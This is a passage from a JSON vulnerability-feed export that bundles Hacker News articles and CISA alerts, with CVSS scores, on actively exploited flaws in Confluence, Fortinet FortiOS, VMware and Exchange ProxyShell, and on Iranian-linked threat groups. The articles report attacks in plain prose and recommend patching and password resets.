"THN:B0B9A91EA9A6465B7D53D33D5B8173CB", "href": "https://thehackernews.com/2023/06/chinese-hackers-using-never-before-seen.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s0/Atlassian-Confluence.jpg>)\n\nThe U.S. Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.\n\n\"Mass exploitation of Atlassian Confluence [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is ongoing and expected to accelerate,\" the Cyber National Mission Force (CNMF) [said](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency ([CISA](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>)) and [Atlassian itself](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) in a series of independent advisories.\n\nBad Packets [noted](<https://twitter.com/bad_packets/status/1433157632370511873>) on Twitter it \"detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution.\"\n\nAtlassian Confluence is a widely popular web-based documentation service that allows teams to create, collaborate, and organize on different projects, offering a common platform to share information in corporate environments. It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.\n\nThe [development](<https://censys.io/blog/cve-2021-26084-confluenza/>) comes days after the Australian company rolled out security updates on August 25 for an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nPut differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.\n\nThe flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nThe issue has been addressed in the following versions \u2014\n\n * 6.13.23\n * 7.4.11\n * 7.11.6\n * 7.12.5\n * 7.13.0\n\nIn the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by mass scanning vulnerable Confluence servers to ensnare potential victims and [install crypto miners](<https://www.bleepingcomputer.com/news/security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/>) after a proof-of-concept (PoC) exploit was [publicly released](<https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md>) earlier this week. Rahul Maini and [Harsh Jaiswal](<https://twitter.com/rootxharsh>), the researchers involved, [described](<https://twitter.com/iamnoooob/status/1431739398782025728>) the process of developing the CVE-2021-26084 exploit as \"relatively simpler than expected.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T07:19:00", "type": "thn", "title": "U.S. Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-28T15:19:43", "id": "THN:080602C4CECD29DACCA496697978CAD0", "href": "https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-04T09:56:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg6QgmIugjApGsSp_v-DgmrWh7TAwmgc2-q7he3aZA3LmwS3p9FJchpB4duBUG7J8wctZHQGDUg2jvObX6Lto5BZUAMDX2xH7JG8EDRyjRmSLmiaQl8rgHeOaQhlEL7oZDJgxSQOX8XlQiMQHLt36bKZAAJU2uaq2rKhruJOh9LNq60PhKcZc8Lj6Dn/s728-e100/hackers.jpg>)\n\nMicrosoft on Thursday said it took steps to disable malicious activity stemming from abuse of OneDrive by a previously undocumented threat actor it tracks under the chemical element-themed moniker Polonium.\n\nIn addition to removing the offending accounts created by the Lebanon-based activity group, the tech giant's Threat Intelligence Center (MSTIC) said it suspended over 20 malicious OneDrive applications created by Polonium andd that it notified affected organizations.\n\n\"The observed activity was coordinated with other actors affiliated with Iran's Ministry of Intelligence and Security (MOIS), based primarily on victim overlap and commonality of tools and techniques,\" MSTIC [assessed](<https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/>) with \"moderate confidence.\"\n\nThe adversarial collective is believed to have breached more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon since February 2022.\n\nTargets of interest included entities in the manufacturing, IT, transportation, defense, government, agriculture, financial, and healthcare sectors, with one cloud service provider compromised to target a downstream aviation company and law firm in what's a case of a supply chain attack.\n\nIn a vast majority of the cases, initial access is believed to have been obtained by exploiting a path traversal flaw in Fortinet appliances ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)), abusing it to drop custom PowerShell implants like CreepySnail that establish connections to a command-and-control (C2) server for follow-on actions.\n\nAttack chains mounted by the actor have involved the use of custom tools that leverage legitimate cloud services such as OneDrive and Dropbox accounts for C2 with its victims using malicious tools dubbed CreepyDrive and CreepyBox.\n\n\"The implant provides basic functionality of allowing the threat actor to upload stolen files and download files to run,\" the researchers said.\n\nThis is not the first time Iranian threat actors have taken advantage of cloud services. In October 2021, Cybereason [disclosed](<https://thehackernews.com/2021/10/iranian-hackers-abuse-dropbox-in.html>) an attack campaign staged by a group called MalKamak that used Dropbox for C2 communications in an attempt to stay under the radar.\n\nAdditionally, MSTIC noted that multiple victims that were compromised by Polonium were previously targeted by another Iranian group called [MuddyWater](<https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html>) (aka Mercury), which has been characterized by the U.S. Cyber Command as a \"subordinate element\" within MOIS.\n\nThe victim overlaps lend credence to earlier reports that MuddyWater is a \"[conglomerate](<https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html>)\" of multiple teams along the lines of Winnti (China) and the Lazarus Group (North Korea).\n\nTo counter such threats, customers are advised to enable multi-factor authentication as well as review and audit partner relationships to minimize any unnecessary permissions.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T09:19:00", "type": "thn", "title": "Microsoft Blocks Iran-linked Lebanese Hackers Targeting Israeli Companies", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-06-04T08:43:20", "id": "THN:8BA951AD00E17C72D6321234DBF80D19", "href": "https://thehackernews.com/2022/06/microsoft-blocks-iran-linked-lebanese.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-09T08:35:28", "description": "[](<https://thehackernews.com/images/-05Y4azfOtHY/YTmz5X6CzVI/AAAAAAAADwU/FmcJruB5qJM-D9XZtYFV-FPRYfwHpYpHwCLcBGAsYHQ/s0/vpng.jpg>)\n\nNetwork security solutions provider Fortinet confirmed that a malicious actor had unauthorizedly disclosed VPN login names and passwords associated with 87,000 FortiGate SSL-VPN devices.\n\n\"These credentials were obtained from systems that remained unpatched against [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>) at the time of the actor's scan. While they may have since been patched, if the passwords were not reset, they remain vulnerable,\" the company [said](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) in a statement on Wednesday.\n\nThe disclosure comes after the threat actor leaked a list of Fortinet credentials for free on a new Russian-speaking forum called [RAMP](<https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/>) that launched in July 2021 as well as on Groove ransomware's data leak site, with Advanced Intel [noting](<https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings>) that the \"breach list contains raw access to the top companies\" spanning across 74 countries, including India, Taiwan, Italy, France, and Israel. \"2,959 out of 22,500 victims are U.S. entities,\" the researchers said.\n\n[](<https://thehackernews.com/images/-HU-9TZrc8Wo/YTm0pyWYXXI/AAAAAAAADwc/12l08TWEhOUM6FKznJkQu0G8qDlpbkrcACLcBGAsYHQ/s0/leak.jpg>)\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) relates to a path traversal vulnerability in the FortiOS SSL VPN web portal, which allows unauthenticated attackers to read arbitrary system files, including the session file, which contains usernames and passwords stored in plaintext. \n\nAlthough the bug was rectified in May 2019, the security weakness has been [repeatedly](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>) [exploited](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) by [multiple](<https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html>) [adversaries](<https://thehackernews.com/2021/05/data-wiper-malware-disguised-as.html>) to deploy an array of [malicious payloads](<https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html>) on unpatched devices, prompting Fortinet to issue a series of advisories in [August 2019](<https://www.fortinet.com/blog/psirt-blogs/fortios-ssl-vulnerability>), [July 2020](<https://www.fortinet.com/blog/psirt-blogs/atp-29-targets-ssl-vpn-flaws>), [April 2021](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>), and again in [June 2021](<https://www.fortinet.com/blog/psirt-blogs/prioritizing-patching-is-essential-for-network-integrity>), urging customers to upgrade affected appliances.\n\n[](<https://thehackernews.com/images/-qUrCccGMLeI/YTm0raORfPI/AAAAAAAADwg/R5dmT1pkUKwnRGYKr_SGB-GiTdIvnz1GACLcBGAsYHQ/s0/stats.jpg>)\n\nCVE-2018-13379 also emerged as one of the [top most exploited flaws](<https://thehackernews.com/2021/07/top-30-critical-security.html>) in 2020, according to a list compiled by intelligence agencies in Australia, the U.K., and the U.S. earlier this year.\n\nIn light of the leak, Fortinet is recommending companies to immediately disable all VPNs, upgrade the devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above followed by initiating an organization-wide password reset, warning that \"you may remain vulnerable post-upgrade if your users' credentials were previously compromised.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T07:16:00", "type": "thn", "title": "Hackers Leak VPN Account Passwords From 87,000 Fortinet FortiGate Devices", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T07:33:52", "id": "THN:8483C1B45A5D7BF5D501DE72F5898935", "href": "https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:39:28", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhvc4vGa2IyZoEewlN5F2HLawFs-FiMfHbW4QfyADIIlt1iZUhIxuVnmgW6OYvwtnA8RRwFKws709zm8x4QGA3Gjc61Xg_tf94C7Z17P13EC8cbOs76bcIf9a5b7SMFV8G7sd8QGfCevWnV_Q9Kg2-lbEV_iKtrOBXnxT2bvyaoQSZsfA8u0fYqJ3e/s728-e100/vmware.jpg>)\n\nA week after VMware released patches to remediate eight security vulnerabilities in VMware Workspace ONE Access, threat actors have begun to actively exploit one of the critical flaws in the wild.\n\nTracked as [CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>), the security shortcoming relates to a remote code execution vulnerability that stems from server-side template injection in VMware Workspace ONE Access and Identity Manager. The bug is rated 9.8 in severity.\n\n\"A malicious actor with network access can trigger a server-side [template injection](<https://attack.mitre.org/techniques/T1221/>) that may result in remote code execution,\" the company [noted](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>) in its advisory.\n\nThe virtualization services provider has since revised its bulletin to warn customers of confirmed exploitation of CVE-2022-22954 occurring in the wild. Cybersecurity firm Bad Packets also [corroborated](<https://twitter.com/bad_packets/status/1514293472697585669>) that it detected attempts to weaponize the vulnerability.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiBkLA9DuiHdpMKAdtIDMXGOSM4ENpxHRWfjsY6YoTBu_2LF_XjrUfbbJ-nYkR8AFIAG8Zazz7eJNKh9X1YP1SCtSa47PJ6yk56jDkN45SwnryIhQxD4kzIcKtkkm98pnuhnXdGOsJh5yD7DrWg8xAbbui46r8dbWBrPqVVjcCI4CyPBgStwOIpdwb-1w/s728-e100/code.jpg>) \n--- \n_Source: [Bad Packets](<https://twitter.com/bad_packets/status/1514293472697585669>)_ \n \nIt's worth noting that the patches shipped last week address seven more vulnerabilities in VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager, four of which are rated Critical, two are rated Important, and one is rated Moderate.\n\nIn light of recurring exploitation of VMWare products by nation-state groups and cyber criminal actors, it's recommended that users move quickly to upgrade to the latest version.\n\n\"This critical vulnerability should be patched or mitigated immediately,\" VMware cautioned last week. \"The ramifications of this vulnerability are serious.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T04:31:00", "type": "thn", "title": "Critical VMware Workspace ONE Access Flaw Under Active Exploitation in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-15T03:14:50", "id": "THN:64D0BEEE72A10FD1445F5CDC2BC902CD", "href": "https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:01", "description": "[](<https://thehackernews.com/images/-cKikIN2o4zA/YK5pX-ibrqI/AAAAAAAACpU/sp4zF_WZEkMPqmuvXXvmNfX9jnVnVLdkwCLcBGAsYHQ/s0/data-wiper-ransomware.jpg>)\n\nResearchers on Tuesday disclosed a new espionage campaign that resorts to destructive data-wiping attacks targeting Israeli entities at least since December 2020 that camouflage the malicious activity as ransomware extortions.\n\nCybersecurity firm SentinelOne attributed the attacks to a nation-state actor affiliated with Iran it tracks under the moniker \"Agrius.\"\n\n\"An analysis of what at first sight appeared to be a ransomware attack revealed new variants of wipers that were deployed in a set of destructive attacks against Israeli targets,\" the researchers [said](<https://assets.sentinelone.com/sentinellabs/evol-agrius>). \"The operators behind the attacks intentionally masked their activity as ransomware attacks, an uncommon behavior for financially motivated groups.\"\n\nThe group's modus operandi involves deploying a custom .NET malware called Apostle that has evolved to become a fully functional ransomware, supplanting its prior wiper capabilities, while some of the attacks have been carried out using a second wiper named DEADWOOD (aka Detbosit) after a logic flaw in early versions of Apostle prevented data from being erased.\n\nIn addition, the Agrius actors drop a .NET implant called IPsec Helper that can be used to exfiltrate data or deploy additional malware. What's more, the threat actor's tactics have also witnessed a shift from espionage to demanding ransoms from its victims to recover access to encrypted data, only to have them actually destroyed in a wiping attack.\n\n[](<https://thehackernews.com/images/-bw6vJJdJmK8/YK5m41wm5XI/AAAAAAAACpM/hW2cbdRji0Qr191iBSXgSHzTAfh_i9ERwCLcBGAsYHQ/s0/vpn.jpg>)\n\nBesides using ProtonVPN for anonymization, the Agrius attack cycle leverages 1-day vulnerabilities in web-based applications, including [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), to gain an initial foothold and subsequently deliver ASPXSpy web shells to maintain remote access to compromised systems and run arbitrary commands.\n\nIf anything, the research adds to evidence that state-sponsored actors with ties to the Iranian government are increasingly looking at ransomware operations as a subterfuge technique to mimic other financially motivated cybercriminal ransomware groups.\n\nRecently leaked documents by Lab Dookhtegan revealed an initiative called \"[Project Signal](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>)'' that linked Iran's Islamic Revolutionary Guard Corps to a ransomware operation through a contracting company.\n\n\"While being disruptive and effective, ransomware activities provide deniability, allowing states to send a message without taking direct blame,\" the researchers said. \"Similar strategies have been used with devastating effect by [other nation-state sponsored actors](<https://thehackernews.com/2017/06/petya-ransomware-decryption-key.html>).\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T15:30:00", "type": "thn", "title": "Data Wiper Malware Disguised As Ransomware Targets Israeli Entities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-06-07T05:01:48", "id": "THN:EAEDDF531EB90375B350E1580DE3DD02", "href": "https://thehackernews.com/2021/05/data-wiper-malware-disguised-as.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:37:32", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgcW-6sY33kcH0dmBIKaK9mpaBaPRVIHpXHjT6Hgy_cMiHxlaNJfxuW1eMvQDiHyvzDLYVJGlJVA2b_pyL6m02QdpItx8VmJbN4PgH539vr05iJNN2nhAyDflMWDr-NbNmKaPQvhSn59trm4goPShyfhF5aIO8nNOTMAMBWoNZZ5zvA73ryI_wfVzbT>)\n\nA \"potentially destructive actor\" aligned with the government of Iran is actively exploiting the well-known [Log4j vulnerability](<https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html>) to infect unpatched VMware Horizon servers with ransomware.\n\nCybersecurity firm SentinelOne dubbed the group \"**TunnelVision**\" owing to their heavy reliance on tunneling tools, with overlaps in tactics observed to that of a broader group tracked under the moniker [Phosphorus](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>) as well as Charming Kitten and Nemesis Kitten.\n\n\"TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions,\" SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky [said](<https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/>) in a report, with the intrusions detected in the Middle East and the U.S.\n\nAlso observed alongside Log4Shell is the exploitation of Fortinet FortiOS path traversal flaw ([CVE-2018-13379](<https://thehackernews.com/2022/02/us-says-russian-hackers-stealing.html>)) and the Microsoft Exchange [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) vulnerability to gain initial access into the target networks for post-exploitation.\n\n\"TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement,\" the researchers said.\n\nThe PowerShell commands are used as a launchpad to download tools like Ngrok and run further commands by means of reverse shells that are employed to drop a PowerShell backdoor that's capable of gathering credentials and executing reconnaissance commands.\n\nSentinelOne also said it identified similarities in the mechanism used to execute the reverse web shell with another PowerShell-based implant called [PowerLess](<https://thehackernews.com/2022/02/iranian-hackers-using-new-powershell.html>) that was disclosed by Cybereason researchers earlier this month.\n\nAll through the activity, the threat actor is said to have utilized a GitHub repository known as \"VmWareHorizon\" under the username \"protections20\" to host the malicious payloads.\n\nThe cybersecurity company said it's associating the attacks to a separate Iranian cluster not because they are unrelated, but owing to the fact that \"there is at present insufficient data to treat them as identical to any of the aforementioned attributions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-18T07:40:00", "type": "thn", "title": "Iranian Hackers Targeting VMware Horizon Log4j Flaws to Deploy Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-02-18T07:40:44", "id": "THN:F25FAD25E15EBBE4934883ABF480294D", "href": "https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cisa": [{"lastseen": "2021-08-22T22:07:03", "description": "Malicious cyber actors are actively exploiting the following ProxyShell vulnerabilities: [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>), and [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>). An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine. CISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply [Microsoft's Security Update from May 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/11/microsoft-releases-may-2021-security-updates>)\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks. \n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-21T00:00:00", "type": "cisa", "title": "Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-21T00:00:00", "id": "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-19T11:27:36", "description": "CISA has issued [Emergency Directive (ED) 22-03](<https://www.cisa.gov/emergency-directive-22-03>) and released a [Cybersecurity Advisory (CSA)](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138b>) in response to active and expected exploitation of multiple vulnerabilities in the following VMware 